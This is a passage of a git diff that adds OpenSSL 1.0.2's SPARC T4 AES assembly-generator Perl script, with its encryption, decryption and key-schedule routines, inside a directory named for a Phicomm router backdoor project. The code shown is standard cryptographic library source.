+	    #emit
+	    print ".byte\t",join(',',map (sprintf("0x%02x",$_),@bytes)),"\n";
+	    next;
+	}
+	$consts=0 if (m/Lconsts:/o);	# end of table
+
+	# instructions prefixed with '?' are endian-specific and need
+	# to be adjusted accordingly...
+	if ($flavour =~ /le$/o) {	# little-endian
+	    s/le\?//o		or
+	    s/be\?/#be#/o	or
+	    s/\?lvsr/lvsl/o	or
+	    s/\?lvsl/lvsr/o	or
+	    s/\?(vperm\s+v[0-9]+,\s*)(v[0-9]+,\s*)(v[0-9]+,\s*)(v[0-9]+)/$1$3$2$4/o or
+	    s/\?(vsldoi\s+v[0-9]+,\s*)(v[0-9]+,)\s*(v[0-9]+,\s*)([0-9]+)/$1$3$2 16-$4/o or
+	    s/\?(vspltw\s+v[0-9]+,\s*)(v[0-9]+,)\s*([0-9])/$1$2 3-$3/o;
+	} else {			# big-endian
+	    s/le\?/#le#/o	or
+	    s/be\?//o		or
+	    s/\?([a-z]+)/$1/o;
+	}
+
+        print $_,"\n";
+}
+
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aest4-sparcv9.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aest4-sparcv9.pl
new file mode 100644
index 0000000..536f23b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aest4-sparcv9.pl
@@ -0,0 +1,919 @@
+#!/usr/bin/env perl
+
+# ====================================================================
+# Written by David S. Miller <davem@devemloft.net> and Andy Polyakov
+# <appro@openssl.org>. The module is licensed under 2-clause BSD
+# license. October 2012. All rights reserved.
+# ====================================================================
+
+######################################################################
+# AES for SPARC T4.
+#
+# AES round instructions complete in 3 cycles and can be issued every
+# cycle. It means that round calculations should take 4*rounds cycles,
+# because any given round instruction depends on result of *both*
+# previous instructions:
+#
+#	|0 |1 |2 |3 |4
+#	|01|01|01|
+#	   |23|23|23|
+#	            |01|01|...
+#	               |23|...
+#
+# Provided that fxor [with IV] takes 3 cycles to complete, critical
+# path length for CBC encrypt would be 3+4*rounds, or in other words
+# it should process one byte in at least (3+4*rounds)/16 cycles. This
+# estimate doesn't account for "collateral" instructions, such as
+# fetching input from memory, xor-ing it with zero-round key and
+# storing the result. Yet, *measured* performance [for data aligned
+# at 64-bit boundary!] deviates from this equation by less than 0.5%:
+#
+#		128-bit key	192-		256-
+# CBC encrypt	2.70/2.90(*)	3.20/3.40	3.70/3.90
+#			 (*) numbers after slash are for
+#			     misaligned data.
+#
+# Out-of-order execution logic managed to fully overlap "collateral"
+# instructions with those on critical path. Amazing!
+#
+# As with Intel AES-NI, question is if it's possible to improve
+# performance of parallelizeable modes by interleaving round
+# instructions. Provided round instruction latency and throughput
+# optimal interleave factor is 2. But can we expect 2x performance
+# improvement? Well, as round instructions can be issued one per
+# cycle, they don't saturate the 2-way issue pipeline and therefore
+# there is room for "collateral" calculations... Yet, 2x speed-up
+# over CBC encrypt remains unattaintable:
+#
+#		128-bit key	192-		256-
+# CBC decrypt	1.64/2.11	1.89/2.37	2.23/2.61
+# CTR		1.64/2.08(*)	1.89/2.33	2.23/2.61
+#			 (*) numbers after slash are for
+#			     misaligned data.
+#
+# Estimates based on amount of instructions under assumption that
+# round instructions are not pairable with any other instruction
+# suggest that latter is the actual case and pipeline runs
+# underutilized. It should be noted that T4 out-of-order execution
+# logic is so capable that performance gain from 2x interleave is
+# not even impressive, ~7-13% over non-interleaved code, largest
+# for 256-bit keys.
+
+# To anchor to something else, software implementation processes
+# one byte in 29 cycles with 128-bit key on same processor. Intel
+# Sandy Bridge encrypts byte in 5.07 cycles in CBC mode and decrypts
+# in 0.93, naturally with AES-NI.
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+push(@INC,"${dir}","${dir}../../perlasm");
+require "sparcv9_modes.pl";
+
+&asm_init(@ARGV);
+
+$::evp=1;	# if $evp is set to 0, script generates module with
+# AES_[en|de]crypt, AES_set_[en|de]crypt_key and AES_cbc_encrypt entry
+# points. These however are not fully compatible with openssl/aes.h,
+# because they expect AES_KEY to be aligned at 64-bit boundary. When
+# used through EVP, alignment is arranged at EVP layer. Second thing
+# that is arranged by EVP is at least 32-bit alignment of IV.
+
+######################################################################
+# single-round subroutines
+#
+{
+my ($inp,$out,$key,$rounds,$tmp,$mask)=map("%o$_",(0..5));
+
+$code.=<<___ if ($::abibits==64);
+.register	%g2,#scratch
+.register	%g3,#scratch
+
+___
+$code.=<<___;
+.text
+
+.globl	aes_t4_encrypt
+.align	32
+aes_t4_encrypt:
+	andcc		$inp, 7, %g1		! is input aligned?
+	andn		$inp, 7, $inp
+
+	ldx		[$key + 0], %g4
+	ldx		[$key + 8], %g5
+
+	ldx		[$inp + 0], %o4
+	bz,pt		%icc, 1f
+	ldx		[$inp + 8], %o5
+	ldx		[$inp + 16], $inp
+	sll		%g1, 3, %g1
+	sub		%g0, %g1, %o3
+	sllx		%o4, %g1, %o4
+	sllx		%o5, %g1, %g1
+	srlx		%o5, %o3, %o5
+	srlx		$inp, %o3, %o3
+	or		%o5, %o4, %o4
+	or		%o3, %g1, %o5
+1:
+	ld		[$key + 240], $rounds
+	ldd		[$key + 16], %f12
+	ldd		[$key + 24], %f14
+	xor		%g4, %o4, %o4
+	xor		%g5, %o5, %o5
+	movxtod		%o4, %f0
+	movxtod		%o5, %f2
+	srl		$rounds, 1, $rounds
+	ldd		[$key + 32], %f16
+	sub		$rounds, 1, $rounds
+	ldd		[$key + 40], %f18
+	add		$key, 48, $key
+
+.Lenc:
+	aes_eround01	%f12, %f0, %f2, %f4
+	aes_eround23	%f14, %f0, %f2, %f2
+	ldd		[$key + 0], %f12
+	ldd		[$key + 8], %f14
+	sub		$rounds,1,$rounds
+	aes_eround01	%f16, %f4, %f2, %f0
+	aes_eround23	%f18, %f4, %f2, %f2
+	ldd		[$key + 16], %f16
+	ldd		[$key + 24], %f18
+	brnz,pt		$rounds, .Lenc
+	add		$key, 32, $key
+
+	andcc		$out, 7, $tmp		! is output aligned?
+	aes_eround01	%f12, %f0, %f2, %f4
+	aes_eround23	%f14, %f0, %f2, %f2
+	aes_eround01_l	%f16, %f4, %f2, %f0
+	aes_eround23_l	%f18, %f4, %f2, %f2
+
+	bnz,pn		%icc, 2f
+	nop
+
+	std		%f0, [$out + 0]
+	retl
+	std		%f2, [$out + 8]
+
+2:	alignaddrl	$out, %g0, $out
+	mov		0xff, $mask
+	srl		$mask, $tmp, $mask
+
+	faligndata	%f0, %f0, %f4
+	faligndata	%f0, %f2, %f6
+	faligndata	%f2, %f2, %f8
+
+	stda		%f4, [$out + $mask]0xc0	! partial store
+	std		%f6, [$out + 8]
+	add		$out, 16, $out
+	orn		%g0, $mask, $mask
+	retl
+	stda		%f8, [$out + $mask]0xc0	! partial store
+.type	aes_t4_encrypt,#function
+.size	aes_t4_encrypt,.-aes_t4_encrypt
+
+.globl	aes_t4_decrypt
+.align	32
+aes_t4_decrypt:
+	andcc		$inp, 7, %g1		! is input aligned?
+	andn		$inp, 7, $inp
+
+	ldx		[$key + 0], %g4
+	ldx		[$key + 8], %g5
+
+	ldx		[$inp + 0], %o4
+	bz,pt		%icc, 1f
+	ldx		[$inp + 8], %o5
+	ldx		[$inp + 16], $inp
+	sll		%g1, 3, %g1
+	sub		%g0, %g1, %o3
+	sllx		%o4, %g1, %o4
+	sllx		%o5, %g1, %g1
+	srlx		%o5, %o3, %o5
+	srlx		$inp, %o3, %o3
+	or		%o5, %o4, %o4
+	or		%o3, %g1, %o5
+1:
+	ld		[$key + 240], $rounds
+	ldd		[$key + 16], %f12
+	ldd		[$key + 24], %f14
+	xor		%g4, %o4, %o4
+	xor		%g5, %o5, %o5
+	movxtod		%o4, %f0
+	movxtod		%o5, %f2
+	srl		$rounds, 1, $rounds
+	ldd		[$key + 32], %f16
+	sub		$rounds, 1, $rounds
+	ldd		[$key + 40], %f18
+	add		$key, 48, $key
+
+.Ldec:
+	aes_dround01	%f12, %f0, %f2, %f4
+	aes_dround23	%f14, %f0, %f2, %f2
+	ldd		[$key + 0], %f12
+	ldd		[$key + 8], %f14
+	sub		$rounds,1,$rounds
+	aes_dround01	%f16, %f4, %f2, %f0
+	aes_dround23	%f18, %f4, %f2, %f2
+	ldd		[$key + 16], %f16
+	ldd		[$key + 24], %f18
+	brnz,pt		$rounds, .Ldec
+	add		$key, 32, $key
+
+	andcc		$out, 7, $tmp		! is output aligned?
+	aes_dround01	%f12, %f0, %f2, %f4
+	aes_dround23	%f14, %f0, %f2, %f2
+	aes_dround01_l	%f16, %f4, %f2, %f0
+	aes_dround23_l	%f18, %f4, %f2, %f2
+
+	bnz,pn		%icc, 2f
+	nop
+
+	std		%f0, [$out + 0]
+	retl
+	std		%f2, [$out + 8]
+
+2:	alignaddrl	$out, %g0, $out
+	mov		0xff, $mask
+	srl		$mask, $tmp, $mask
+
+	faligndata	%f0, %f0, %f4
+	faligndata	%f0, %f2, %f6
+	faligndata	%f2, %f2, %f8
+
+	stda		%f4, [$out + $mask]0xc0	! partial store
+	std		%f6, [$out + 8]
+	add		$out, 16, $out
+	orn		%g0, $mask, $mask
+	retl
+	stda		%f8, [$out + $mask]0xc0	! partial store
+.type	aes_t4_decrypt,#function
+.size	aes_t4_decrypt,.-aes_t4_decrypt
+___
+}
+
+######################################################################
+# key setup subroutines
+#
+{
+my ($inp,$bits,$out,$tmp)=map("%o$_",(0..5));
+$code.=<<___;
+.globl	aes_t4_set_encrypt_key
+.align	32
+aes_t4_set_encrypt_key:
+.Lset_encrypt_key:
+	and		$inp, 7, $tmp
+	alignaddr	$inp, %g0, $inp
+	cmp		$bits, 192
+	ldd		[$inp + 0], %f0
+	bl,pt		%icc,.L128
+	ldd		[$inp + 8], %f2
+
+	be,pt		%icc,.L192
+	ldd		[$inp + 16], %f4
+	brz,pt		$tmp, .L256aligned
+	ldd		[$inp + 24], %f6
+
+	ldd		[$inp + 32], %f8
+	faligndata	%f0, %f2, %f0
+	faligndata	%f2, %f4, %f2
+	faligndata	%f4, %f6, %f4
+	faligndata	%f6, %f8, %f6
+.L256aligned:
+___
+for ($i=0; $i<6; $i++) {
+    $code.=<<___;
+	std		%f0, [$out + `32*$i+0`]
+	aes_kexpand1	%f0, %f6, $i, %f0
+	std		%f2, [$out + `32*$i+8`]
+	aes_kexpand2	%f2, %f0, %f2
+	std		%f4, [$out + `32*$i+16`]
+	aes_kexpand0	%f4, %f2, %f4
+	std		%f6, [$out + `32*$i+24`]
+	aes_kexpand2	%f6, %f4, %f6
+___
+}
+$code.=<<___;
+	std		%f0, [$out + `32*$i+0`]
+	aes_kexpand1	%f0, %f6, $i, %f0
+	std		%f2, [$out + `32*$i+8`]
+	aes_kexpand2	%f2, %f0, %f2
+	std		%f4, [$out + `32*$i+16`]
+	std		%f6, [$out + `32*$i+24`]
+	std		%f0, [$out + `32*$i+32`]
+	std		%f2, [$out + `32*$i+40`]
+
+	mov		14, $tmp
+	st		$tmp, [$out + 240]
+	retl
+	xor		%o0, %o0, %o0
+
+.align	16
+.L192:
+	brz,pt		$tmp, .L192aligned
+	nop
+
+	ldd		[$inp + 24], %f6
+	faligndata	%f0, %f2, %f0
+	faligndata	%f2, %f4, %f2
+	faligndata	%f4, %f6, %f4
+.L192aligned:
+___
+for ($i=0; $i<7; $i++) {
+    $code.=<<___;
+	std		%f0, [$out + `24*$i+0`]
+	aes_kexpand1	%f0, %f4, $i, %f0
+	std		%f2, [$out + `24*$i+8`]
+	aes_kexpand2	%f2, %f0, %f2
+	std		%f4, [$out + `24*$i+16`]
+	aes_kexpand2	%f4, %f2, %f4
+___
+}
+$code.=<<___;
+	std		%f0, [$out + `24*$i+0`]
+	aes_kexpand1	%f0, %f4, $i, %f0
+	std		%f2, [$out + `24*$i+8`]
+	aes_kexpand2	%f2, %f0, %f2
+	std		%f4, [$out + `24*$i+16`]
+	std		%f0, [$out + `24*$i+24`]
+	std		%f2, [$out + `24*$i+32`]
+
+	mov		12, $tmp
+	st		$tmp, [$out + 240]
+	retl
+	xor		%o0, %o0, %o0
+
+.align	16
+.L128:
+	brz,pt		$tmp, .L128aligned
+	nop
+
+	ldd		[$inp + 16], %f4
+	faligndata	%f0, %f2, %f0
+	faligndata	%f2, %f4, %f2
+.L128aligned:
+___
+for ($i=0; $i<10; $i++) {
+    $code.=<<___;
+	std		%f0, [$out + `16*$i+0`]
+	aes_kexpand1	%f0, %f2, $i, %f0
+	std		%f2, [$out + `16*$i+8`]
+	aes_kexpand2	%f2, %f0, %f2
+___
+}
+$code.=<<___;
+	std		%f0, [$out + `16*$i+0`]
+	std		%f2, [$out + `16*$i+8`]
+
+	mov		10, $tmp
+	st		$tmp, [$out + 240]
+	retl
+	xor		%o0, %o0, %o0
+.type	aes_t4_set_encrypt_key,#function
+.size	aes_t4_set_encrypt_key,.-aes_t4_set_encrypt_key
+
+.globl	aes_t4_set_decrypt_key
+.align	32
+aes_t4_set_decrypt_key:
+	mov		%o7, %o5
+	call		.Lset_encrypt_key
+	nop
+
+	mov		%o5, %o7
+	sll		$tmp, 4, $inp		! $tmp is number of rounds
+	add		$tmp, 2, $tmp
+	add		$out, $inp, $inp	! $inp=$out+16*rounds
+	srl		$tmp, 2, $tmp		! $tmp=(rounds+2)/4
+
+.Lkey_flip:
+	ldd		[$out + 0],  %f0
+	ldd		[$out + 8],  %f2
+	ldd		[$out + 16], %f4
+	ldd		[$out + 24], %f6
+	ldd		[$inp + 0],  %f8
+	ldd		[$inp + 8],  %f10
+	ldd		[$inp - 16], %f12
+	ldd		[$inp - 8],  %f14
+	sub		$tmp, 1, $tmp
+	std		%f0, [$inp + 0]
+	std		%f2, [$inp + 8]
+	std		%f4, [$inp - 16]
+	std		%f6, [$inp - 8]
+	std		%f8, [$out + 0]
+	std		%f10, [$out + 8]
+	std		%f12, [$out + 16]
+	std		%f14, [$out + 24]
+	add		$out, 32, $out
+	brnz		$tmp, .Lkey_flip
+	sub		$inp, 32, $inp
+
+	retl
+	xor		%o0, %o0, %o0
+.type	aes_t4_set_decrypt_key,#function
+.size	aes_t4_set_decrypt_key,.-aes_t4_set_decrypt_key
+___
+}
+
+{{{
+my ($inp,$out,$len,$key,$ivec,$enc)=map("%i$_",(0..5));
+my ($ileft,$iright,$ooff,$omask,$ivoff)=map("%l$_",(1..7));
+
+$code.=<<___;
+.align	32
+_aes128_encrypt_1x:
+___
+for ($i=0; $i<4; $i++) {
+    $code.=<<___;
+	aes_eround01	%f`16+8*$i+0`, %f0, %f2, %f4
+	aes_eround23	%f`16+8*$i+2`, %f0, %f2, %f2
+	aes_eround01	%f`16+8*$i+4`, %f4, %f2, %f0
+	aes_eround23	%f`16+8*$i+6`, %f4, %f2, %f2
+___
+}
+$code.=<<___;
+	aes_eround01	%f48, %f0, %f2, %f4
+	aes_eround23	%f50, %f0, %f2, %f2
+	aes_eround01_l	%f52, %f4, %f2, %f0
+	retl
+	aes_eround23_l	%f54, %f4, %f2, %f2
+.type	_aes128_encrypt_1x,#function
+.size	_aes128_encrypt_1x,.-_aes128_encrypt_1x
+
+.align	32
+_aes128_encrypt_2x:
+___
+for ($i=0; $i<4; $i++) {
+    $code.=<<___;
+	aes_eround01	%f`16+8*$i+0`, %f0, %f2, %f8
+	aes_eround23	%f`16+8*$i+2`, %f0, %f2, %f2
+	aes_eround01	%f`16+8*$i+0`, %f4, %f6, %f10
+	aes_eround23	%f`16+8*$i+2`, %f4, %f6, %f6
+	aes_eround01	%f`16+8*$i+4`, %f8, %f2, %f0
+	aes_eround23	%f`16+8*$i+6`, %f8, %f2, %f2
+	aes_eround01	%f`16+8*$i+4`, %f10, %f6, %f4
+	aes_eround23	%f`16+8*$i+6`, %f10, %f6, %f6
+___
+}
+$code.=<<___;
+	aes_eround01	%f48, %f0, %f2, %f8
+	aes_eround23	%f50, %f0, %f2, %f2
+	aes_eround01	%f48, %f4, %f6, %f10
+	aes_eround23	%f50, %f4, %f6, %f6
+	aes_eround01_l	%f52, %f8, %f2, %f0
+	aes_eround23_l	%f54, %f8, %f2, %f2
+	aes_eround01_l	%f52, %f10, %f6, %f4
+	retl
+	aes_eround23_l	%f54, %f10, %f6, %f6
+.type	_aes128_encrypt_2x,#function
+.size	_aes128_encrypt_2x,.-_aes128_encrypt_2x
+
+.align	32
+_aes128_loadkey:
+	ldx		[$key + 0], %g4
+	ldx		[$key + 8], %g5
+___
+for ($i=2; $i<22;$i++) {			# load key schedule
+    $code.=<<___;
+	ldd		[$key + `8*$i`], %f`12+2*$i`
+___
+}
+$code.=<<___;
+	retl
+	nop
+.type	_aes128_loadkey,#function
+.size	_aes128_loadkey,.-_aes128_loadkey
+_aes128_load_enckey=_aes128_loadkey
+_aes128_load_deckey=_aes128_loadkey
+
+___
+
+&alg_cbc_encrypt_implement("aes",128);
+if ($::evp) {
+    &alg_ctr32_implement("aes",128);
+    &alg_xts_implement("aes",128,"en");
+    &alg_xts_implement("aes",128,"de");
+}
+&alg_cbc_decrypt_implement("aes",128);
+
+$code.=<<___;
+.align	32
+_aes128_decrypt_1x:
+___
+for ($i=0; $i<4; $i++) {
+    $code.=<<___;
+	aes_dround01	%f`16+8*$i+0`, %f0, %f2, %f4
+	aes_dround23	%f`16+8*$i+2`, %f0, %f2, %f2
+	aes_dround01	%f`16+8*$i+4`, %f4, %f2, %f0
+	aes_dround23	%f`16+8*$i+6`, %f4, %f2, %f2
+___
+}
+$code.=<<___;
+	aes_dround01	%f48, %f0, %f2, %f4
+	aes_dround23	%f50, %f0, %f2, %f2
+	aes_dround01_l	%f52, %f4, %f2, %f0
+	retl
+	aes_dround23_l	%f54, %f4, %f2, %f2
+.type	_aes128_decrypt_1x,#function
+.size	_aes128_decrypt_1x,.-_aes128_decrypt_1x
+
+.align	32
+_aes128_decrypt_2x:
+___
+for ($i=0; $i<4; $i++) {
+    $code.=<<___;
+	aes_dround01	%f`16+8*$i+0`, %f0, %f2, %f8
+	aes_dround23	%f`16+8*$i+2`, %f0, %f2, %f2
+	aes_dround01	%f`16+8*$i+0`, %f4, %f6, %f10
+	aes_dround23	%f`16+8*$i+2`, %f4, %f6, %f6
+	aes_dround01	%f`16+8*$i+4`, %f8, %f2, %f0
+	aes_dround23	%f`16+8*$i+6`, %f8, %f2, %f2
+	aes_dround01	%f`16+8*$i+4`, %f10, %f6, %f4
+	aes_dround23	%f`16+8*$i+6`, %f10, %f6, %f6
+___
+}
+$code.=<<___;
+	aes_dround01	%f48, %f0, %f2, %f8
+	aes_dround23	%f50, %f0, %f2, %f2
+	aes_dround01	%f48, %f4, %f6, %f10
+	aes_dround23	%f50, %f4, %f6, %f6
+	aes_dround01_l	%f52, %f8, %f2, %f0
+	aes_dround23_l	%f54, %f8, %f2, %f2
+	aes_dround01_l	%f52, %f10, %f6, %f4
+	retl
+	aes_dround23_l	%f54, %f10, %f6, %f6
+.type	_aes128_decrypt_2x,#function
+.size	_aes128_decrypt_2x,.-_aes128_decrypt_2x
+___
+
+$code.=<<___;
+.align	32
+_aes192_encrypt_1x:
+___
+for ($i=0; $i<5; $i++) {
+    $code.=<<___;
+	aes_eround01	%f`16+8*$i+0`, %f0, %f2, %f4
+	aes_eround23	%f`16+8*$i+2`, %f0, %f2, %f2
+	aes_eround01	%f`16+8*$i+4`, %f4, %f2, %f0
+	aes_eround23	%f`16+8*$i+6`, %f4, %f2, %f2
+___
+}
+$code.=<<___;
+	aes_eround01	%f56, %f0, %f2, %f4
+	aes_eround23	%f58, %f0, %f2, %f2
+	aes_eround01_l	%f60, %f4, %f2, %f0
+	retl
+	aes_eround23_l	%f62, %f4, %f2, %f2
+.type	_aes192_encrypt_1x,#function
+.size	_aes192_encrypt_1x,.-_aes192_encrypt_1x
+
+.align	32
+_aes192_encrypt_2x:
+___
+for ($i=0; $i<5; $i++) {
+    $code.=<<___;
+	aes_eround01	%f`16+8*$i+0`, %f0, %f2, %f8
+	aes_eround23	%f`16+8*$i+2`, %f0, %f2, %f2
+	aes_eround01	%f`16+8*$i+0`, %f4, %f6, %f10
+	aes_eround23	%f`16+8*$i+2`, %f4, %f6, %f6
+	aes_eround01	%f`16+8*$i+4`, %f8, %f2, %f0
+	aes_eround23	%f`16+8*$i+6`, %f8, %f2, %f2
+	aes_eround01	%f`16+8*$i+4`, %f10, %f6, %f4
+	aes_eround23	%f`16+8*$i+6`, %f10, %f6, %f6
+___
+}
+$code.=<<___;
+	aes_eround01	%f56, %f0, %f2, %f8
+	aes_eround23	%f58, %f0, %f2, %f2
+	aes_eround01	%f56, %f4, %f6, %f10
+	aes_eround23	%f58, %f4, %f6, %f6
+	aes_eround01_l	%f60, %f8, %f2, %f0
+	aes_eround23_l	%f62, %f8, %f2, %f2
+	aes_eround01_l	%f60, %f10, %f6, %f4
+	retl
+	aes_eround23_l	%f62, %f10, %f6, %f6
+.type	_aes192_encrypt_2x,#function
+.size	_aes192_encrypt_2x,.-_aes192_encrypt_2x
+
+.align	32
+_aes256_encrypt_1x:
+	aes_eround01	%f16, %f0, %f2, %f4
+	aes_eround23	%f18, %f0, %f2, %f2
+	ldd		[$key + 208], %f16
+	ldd		[$key + 216], %f18
+	aes_eround01	%f20, %f4, %f2, %f0
+	aes_eround23	%f22, %f4, %f2, %f2
+	ldd		[$key + 224], %f20
+	ldd		[$key + 232], %f22
+___
+for ($i=1; $i<6; $i++) {
+    $code.=<<___;
+	aes_eround01	%f`16+8*$i+0`, %f0, %f2, %f4
+	aes_eround23	%f`16+8*$i+2`, %f0, %f2, %f2
+	aes_eround01	%f`16+8*$i+4`, %f4, %f2, %f0
+	aes_eround23	%f`16+8*$i+6`, %f4, %f2, %f2
+___
+}
+$code.=<<___;
+	aes_eround01	%f16, %f0, %f2, %f4
+	aes_eround23	%f18, %f0, %f2, %f2
+	ldd		[$key + 16], %f16
+	ldd		[$key + 24], %f18
+	aes_eround01_l	%f20, %f4, %f2, %f0
+	aes_eround23_l	%f22, %f4, %f2, %f2
+	ldd		[$key + 32], %f20
+	retl
+	ldd		[$key + 40], %f22
+.type	_aes256_encrypt_1x,#function
+.size	_aes256_encrypt_1x,.-_aes256_encrypt_1x
+
+.align	32
+_aes256_encrypt_2x:
+	aes_eround01	%f16, %f0, %f2, %f8
+	aes_eround23	%f18, %f0, %f2, %f2
+	aes_eround01	%f16, %f4, %f6, %f10
+	aes_eround23	%f18, %f4, %f6, %f6
+	ldd		[$key + 208], %f16
+	ldd		[$key + 216], %f18
+	aes_eround01	%f20, %f8, %f2, %f0
+	aes_eround23	%f22, %f8, %f2, %f2
+	aes_eround01	%f20, %f10, %f6, %f4
+	aes_eround23	%f22, %f10, %f6, %f6
+	ldd		[$key + 224], %f20
+	ldd		[$key + 232], %f22
+___
+for ($i=1; $i<6; $i++) {
+    $code.=<<___;
+	aes_eround01	%f`16+8*$i+0`, %f0, %f2, %f8
+	aes_eround23	%f`16+8*$i+2`, %f0, %f2, %f2
+	aes_eround01	%f`16+8*$i+0`, %f4, %f6, %f10
+	aes_eround23	%f`16+8*$i+2`, %f4, %f6, %f6
+	aes_eround01	%f`16+8*$i+4`, %f8, %f2, %f0
+	aes_eround23	%f`16+8*$i+6`, %f8, %f2, %f2
+	aes_eround01	%f`16+8*$i+4`, %f10, %f6, %f4
+	aes_eround23	%f`16+8*$i+6`, %f10, %f6, %f6
+___
+}
+$code.=<<___;
+	aes_eround01	%f16, %f0, %f2, %f8
+	aes_eround23	%f18, %f0, %f2, %f2
+	aes_eround01	%f16, %f4, %f6, %f10
+	aes_eround23	%f18, %f4, %f6, %f6
+	ldd		[$key + 16], %f16
+	ldd		[$key + 24], %f18
+	aes_eround01_l	%f20, %f8, %f2, %f0
+	aes_eround23_l	%f22, %f8, %f2, %f2
+	aes_eround01_l	%f20, %f10, %f6, %f4
+	aes_eround23_l	%f22, %f10, %f6, %f6
+	ldd		[$key + 32], %f20
+	retl
+	ldd		[$key + 40], %f22
+.type	_aes256_encrypt_2x,#function
+.size	_aes256_encrypt_2x,.-_aes256_encrypt_2x
+
+.align	32
+_aes192_loadkey:
+	ldx		[$key + 0], %g4
+	ldx		[$key + 8], %g5
+___
+for ($i=2; $i<26;$i++) {			# load key schedule
+    $code.=<<___;
+	ldd		[$key + `8*$i`], %f`12+2*$i`
+___
+}
+$code.=<<___;
+	retl
+	nop
+.type	_aes192_loadkey,#function
+.size	_aes192_loadkey,.-_aes192_loadkey
+_aes256_loadkey=_aes192_loadkey
+_aes192_load_enckey=_aes192_loadkey
+_aes192_load_deckey=_aes192_loadkey
+_aes256_load_enckey=_aes192_loadkey
+_aes256_load_deckey=_aes192_loadkey
+___
+
+&alg_cbc_encrypt_implement("aes",256);
+&alg_cbc_encrypt_implement("aes",192);
+if ($::evp) {
+    &alg_ctr32_implement("aes",256);
+    &alg_xts_implement("aes",256,"en");
+    &alg_xts_implement("aes",256,"de");
+    &alg_ctr32_implement("aes",192);
+}
+&alg_cbc_decrypt_implement("aes",192);
+&alg_cbc_decrypt_implement("aes",256);
+
+$code.=<<___;
+.align	32
+_aes256_decrypt_1x:
+	aes_dround01	%f16, %f0, %f2, %f4
+	aes_dround23	%f18, %f0, %f2, %f2
+	ldd		[$key + 208], %f16
+	ldd		[$key + 216], %f18
+	aes_dround01	%f20, %f4, %f2, %f0
+	aes_dround23	%f22, %f4, %f2, %f2
+	ldd		[$key + 224], %f20
+	ldd		[$key + 232], %f22
+___
+for ($i=1; $i<6; $i++) {
+    $code.=<<___;
+	aes_dround01	%f`16+8*$i+0`, %f0, %f2, %f4
+	aes_dround23	%f`16+8*$i+2`, %f0, %f2, %f2
+	aes_dround01	%f`16+8*$i+4`, %f4, %f2, %f0
+	aes_dround23	%f`16+8*$i+6`, %f4, %f2, %f2
+___
+}
+$code.=<<___;
+	aes_dround01	%f16, %f0, %f2, %f4
+	aes_dround23	%f18, %f0, %f2, %f2
+	ldd		[$key + 16], %f16
+	ldd		[$key + 24], %f18
+	aes_dround01_l	%f20, %f4, %f2, %f0
+	aes_dround23_l	%f22, %f4, %f2, %f2
+	ldd		[$key + 32], %f20
+	retl
+	ldd		[$key + 40], %f22
+.type	_aes256_decrypt_1x,#function
+.size	_aes256_decrypt_1x,.-_aes256_decrypt_1x
+
+.align	32
+_aes256_decrypt_2x:
+	aes_dround01	%f16, %f0, %f2, %f8
+	aes_dround23	%f18, %f0, %f2, %f2
+	aes_dround01	%f16, %f4, %f6, %f10
+	aes_dround23	%f18, %f4, %f6, %f6
+	ldd		[$key + 208], %f16
+	ldd		[$key + 216], %f18
+	aes_dround01	%f20, %f8, %f2, %f0
+	aes_dround23	%f22, %f8, %f2, %f2
+	aes_dround01	%f20, %f10, %f6, %f4
+	aes_dround23	%f22, %f10, %f6, %f6
+	ldd		[$key + 224], %f20
+	ldd		[$key + 232], %f22
+___
+for ($i=1; $i<6; $i++) {
+    $code.=<<___;
+	aes_dround01	%f`16+8*$i+0`, %f0, %f2, %f8
+	aes_dround23	%f`16+8*$i+2`, %f0, %f2, %f2
+	aes_dround01	%f`16+8*$i+0`, %f4, %f6, %f10
+	aes_dround23	%f`16+8*$i+2`, %f4, %f6, %f6
+	aes_dround01	%f`16+8*$i+4`, %f8, %f2, %f0
+	aes_dround23	%f`16+8*$i+6`, %f8, %f2, %f2
+	aes_dround01	%f`16+8*$i+4`, %f10, %f6, %f4
+	aes_dround23	%f`16+8*$i+6`, %f10, %f6, %f6
+___
+}
+$code.=<<___;
+	aes_dround01	%f16, %f0, %f2, %f8
+	aes_dround23	%f18, %f0, %f2, %f2
+	aes_dround01	%f16, %f4, %f6, %f10
+	aes_dround23	%f18, %f4, %f6, %f6
+	ldd		[$key + 16], %f16
+	ldd		[$key + 24], %f18
+	aes_dround01_l	%f20, %f8, %f2, %f0
+	aes_dround23_l	%f22, %f8, %f2, %f2
+	aes_dround01_l	%f20, %f10, %f6, %f4
+	aes_dround23_l	%f22, %f10, %f6, %f6
+	ldd		[$key + 32], %f20
+	retl
+	ldd		[$key + 40], %f22
+.type	_aes256_decrypt_2x,#function
+.size	_aes256_decrypt_2x,.-_aes256_decrypt_2x
+
+.align	32
+_aes192_decrypt_1x:
+___
+for ($i=0; $i<5; $i++) {
+    $code.=<<___;
+	aes_dround01	%f`16+8*$i+0`, %f0, %f2, %f4
+	aes_dround23	%f`16+8*$i+2`, %f0, %f2, %f2
+	aes_dround01	%f`16+8*$i+4`, %f4, %f2, %f0
+	aes_dround23	%f`16+8*$i+6`, %f4, %f2, %f2
+___
+}
+$code.=<<___;
+	aes_dround01	%f56, %f0, %f2, %f4
+	aes_dround23	%f58, %f0, %f2, %f2
+	aes_dround01_l	%f60, %f4, %f2, %f0
+	retl
+	aes_dround23_l	%f62, %f4, %f2, %f2
+.type	_aes192_decrypt_1x,#function
+.size	_aes192_decrypt_1x,.-_aes192_decrypt_1x
+
+.align	32
+_aes192_decrypt_2x:
+___
+for ($i=0; $i<5; $i++) {
+    $code.=<<___;
+	aes_dround01	%f`16+8*$i+0`, %f0, %f2, %f8
+	aes_dround23	%f`16+8*$i+2`, %f0, %f2, %f2
+	aes_dround01	%f`16+8*$i+0`, %f4, %f6, %f10
+	aes_dround23	%f`16+8*$i+2`, %f4, %f6, %f6
+	aes_dround01	%f`16+8*$i+4`, %f8, %f2, %f0
+	aes_dround23	%f`16+8*$i+6`, %f8, %f2, %f2
+	aes_dround01	%f`16+8*$i+4`, %f10, %f6, %f4
+	aes_dround23	%f`16+8*$i+6`, %f10, %f6, %f6
+___
+}
+$code.=<<___;
+	aes_dround01	%f56, %f0, %f2, %f8
+	aes_dround23	%f58, %f0, %f2, %f2
+	aes_dround01	%f56, %f4, %f6, %f10
